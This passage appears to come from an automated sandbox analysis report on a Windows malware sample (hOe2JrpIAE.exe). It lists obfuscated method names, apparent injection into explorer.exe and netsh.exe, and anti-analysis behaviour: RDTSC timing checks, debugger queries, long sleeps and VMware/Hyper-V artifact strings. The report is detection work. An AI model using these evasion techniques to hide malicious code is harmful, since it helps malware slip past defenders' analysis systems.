                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, Qri0x7syuiRNrevCve.csHigh entropy of concatenated method names: 'J2aMxA0UM1', 'B6yMqDFdni', 'tpDM6tDVFl', 'mPSMshdccI', 'O34MAEKjqo', 'pQlMfKV6d4', 'AeHMborSHI', 'QrBMa4nAIt', 'dsbMi07RYD', 'xwLMHakJkF'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, tvOcrl3eIFMEK0gRcO.csHigh entropy of concatenated method names: 'abDj7cM5m', 'QdRxgAyi3', 'iLcqIiUb0', 'RTiZrfX2K', 'Qr6sxfsTp', 'cEoSXov0g', 'v8LZH9gJx5Gh7UvxH2', 'fxsGkOEmfZHALJnd6I', 'pXqNLXqPx37goTvdSS', 'JTPaPMS0i'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, rsRPv9JO8iJZ0C7ddKS.csHigh entropy of concatenated method names: 'aH3iogLVuU', 'HgjiUF1F2A', 'LuqijFmNcF', 'G6mixOE7A8', 'AeWiFvfy80', 'S8piqOQUeA', 'of2iZGnsqX', 'lkei6TIX6N', 'L1QisGbI1H', 'dGriSa8to2'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, vHjLiUmOYvJOUgmPGm.csHigh entropy of concatenated method names: 'GTnAGAiMDn', 'UmAARElWjW', 'm4NAm78BOR', 'rSUAuxnVQQ', 'XPLAIs8dFR', 'tb8ACN10DV', 'T7FATXVx5U', 'oGUAKObAGc', 'hixAn2YyXP', 'wyLA8C05xJ'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, jLW4CR6YqLFnTWAfMo.csHigh entropy of concatenated method names: 'rwqQmtdjy9', 'PUiQu6Ub38', 'sfdQLvdlAZ', 'VI7Q96X73F', 'kqMQNE0nGR', 'wOnQWByQFZ', 'L0gQtC2B6n', 'BkAQ4aW7D7', 'TqHQ2flayW', 'l0nQ1YQ7wv'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, nx1Pfh21Wu3GVp1PSa.csHigh entropy of concatenated method names: 'OiWagDlWZd', 'DD8aIfaMm5', 'wHFaCyPw2v', 'wUnaTk55yD', 'tTjamCRrNc', 'UDnaKlsyO6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
                Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 30B9904 second address: 30B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 30B9B7E second address: 30B9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory allocated: 4F90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory allocated: 7C20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory allocated: 8C20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory allocated: 8ED0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeMemory allocated: 9ED0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_00409AB0 rdtsc 6_2_00409AB0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3135Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 6805Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 882Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 868Jump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 9799Jump to behavior
                Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_7-13934
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeAPI coverage: 1.6 %
                Source: C:\Windows\SysWOW64\netsh.exeAPI coverage: 1.4 %
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe TID: 3748Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 1968Thread sleep count: 3135 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1968Thread sleep time: -6270000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 1968Thread sleep count: 6805 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1968Thread sleep time: -13610000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exe TID: 4524Thread sleep count: 172 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\netsh.exe TID: 4524Thread sleep time: -344000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exe TID: 4524Thread sleep count: 9799 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\netsh.exe TID: 4524Thread sleep time: -19598000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: explorer.exe, 00000007.00000002.4447809365.0000000009C96000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                Source: explorer.exe, 00000007.00000002.4444797028.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                Source: explorer.exe, 00000007.00000000.2010640411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4446934807.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                Source: explorer.exe, 00000007.00000002.4447710215.0000000009B81000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000007.00000003.3777482422.0000000009B72000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                Source: explorer.exe, 00000007.00000002.4447809365.0000000009C96000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000007.00000002.4446934807.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                Source: explorer.exe, 00000007.00000003.3094915197.0000000003549000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                Source: explorer.exe, 00000007.00000002.4447809365.0000000009C96000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: explorer.exe, 00000007.00000002.4441584000.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                Source: explorer.exe, 00000007.00000003.3094915197.0000000003549000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                Source: explorer.exe, 00000007.00000002.4444797028.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                Source: explorer.exe, 00000007.00000000.2010640411.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4446934807.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000007.00000003.3094915197.0000000003549000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                Source: explorer.exe, 00000007.00000003.3094915197.0000000003549000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
                Source: explorer.exe, 00000007.00000002.4447710215.0000000009B81000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                Source: explorer.exe, 00000007.00000002.4447809365.0000000009C96000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
                Source: explorer.exe, 00000007.00000002.4441584000.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000007.00000002.4446934807.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000007.00000000.2009042834.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_00409AB0 rdtsc 6_2_00409AB0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0040ACF0 LdrLoadDll,6_2_0040ACF0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EA118 mov ecx, dword ptr fs:[00000030h]6_2_011EA118
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EA118 mov eax, dword ptr fs:[00000030h]6_2_011EA118
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EA118 mov eax, dword ptr fs:[00000030h]6_2_011EA118
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EA118 mov eax, dword ptr fs:[00000030h]6_2_011EA118
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EE10E mov eax, dword ptr fs:[00000030h]6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EE10E mov ecx, dword ptr fs:[00000030h]6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EE10E mov eax, dword ptr fs:[00000030h]6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EE10E mov eax, dword ptr fs:[00000030h]6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EE10E mov ecx, dword ptr fs:[00000030h]6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EE10E mov eax, dword ptr fs:[00000030h]6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EE10E mov eax, dword ptr fs:[00000030h]6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EE10E mov ecx, dword ptr fs:[00000030h]6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EE10E mov eax, dword ptr fs:[00000030h]6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EE10E mov ecx, dword ptr fs:[00000030h]6_2_011EE10E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01170124 mov eax, dword ptr fs:[00000030h]6_2_01170124
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01200115 mov eax, dword ptr fs:[00000030h]6_2_01200115
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01146154 mov eax, dword ptr fs:[00000030h]6_2_01146154
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01146154 mov eax, dword ptr fs:[00000030h]6_2_01146154
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0113C156 mov eax, dword ptr fs:[00000030h]6_2_0113C156
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D8158 mov eax, dword ptr fs:[00000030h]6_2_011D8158
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01214164 mov eax, dword ptr fs:[00000030h]6_2_01214164
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01214164 mov eax, dword ptr fs:[00000030h]6_2_01214164
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D4144 mov eax, dword ptr fs:[00000030h]6_2_011D4144
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D4144 mov eax, dword ptr fs:[00000030h]6_2_011D4144
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D4144 mov ecx, dword ptr fs:[00000030h]6_2_011D4144
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D4144 mov eax, dword ptr fs:[00000030h]6_2_011D4144
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D4144 mov eax, dword ptr fs:[00000030h]6_2_011D4144
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C019F mov eax, dword ptr fs:[00000030h]6_2_011C019F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C019F mov eax, dword ptr fs:[00000030h]6_2_011C019F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C019F mov eax, dword ptr fs:[00000030h]6_2_011C019F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C019F mov eax, dword ptr fs:[00000030h]6_2_011C019F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0113A197 mov eax, dword ptr fs:[00000030h]6_2_0113A197
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0113A197 mov eax, dword ptr fs:[00000030h]6_2_0113A197
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0113A197 mov eax, dword ptr fs:[00000030h]6_2_0113A197
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011FC188 mov eax, dword ptr fs:[00000030h]6_2_011FC188
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011FC188 mov eax, dword ptr fs:[00000030h]6_2_011FC188
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01180185 mov eax, dword ptr fs:[00000030h]6_2_01180185
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E4180 mov eax, dword ptr fs:[00000030h]6_2_011E4180
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E4180 mov eax, dword ptr fs:[00000030h]6_2_011E4180
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_012161E5 mov eax, dword ptr fs:[00000030h]6_2_012161E5
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE1D0 mov eax, dword ptr fs:[00000030h]6_2_011BE1D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE1D0 mov eax, dword ptr fs:[00000030h]6_2_011BE1D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE1D0 mov ecx, dword ptr fs:[00000030h]6_2_011BE1D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE1D0 mov eax, dword ptr fs:[00000030h]6_2_011BE1D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BE1D0 mov eax, dword ptr fs:[00000030h]6_2_011BE1D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_012061C3 mov eax, dword ptr fs:[00000030h]6_2_012061C3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_012061C3 mov eax, dword ptr fs:[00000030h]6_2_012061C3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011701F8 mov eax, dword ptr fs:[00000030h]6_2_011701F8
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115E016 mov eax, dword ptr fs:[00000030h]6_2_0115E016
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115E016 mov eax, dword ptr fs:[00000030h]6_2_0115E016
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115E016 mov eax, dword ptr fs:[00000030h]6_2_0115E016
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115E016 mov eax, dword ptr fs:[00000030h]6_2_0115E016
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C4000 mov ecx, dword ptr fs:[00000030h]6_2_011C4000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h]6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h]6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h]6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h]6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h]6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h]6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h]6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E2000 mov eax, dword ptr fs:[00000030h]6_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D6030 mov eax, dword ptr fs:[00000030h]6_2_011D6030
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0113A020 mov eax, dword ptr fs:[00000030h]6_2_0113A020
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0113C020 mov eax, dword ptr fs:[00000030h]6_2_0113C020
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01142050 mov eax, dword ptr fs:[00000030h]6_2_01142050
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C6050 mov eax, dword ptr fs:[00000030h]6_2_011C6050
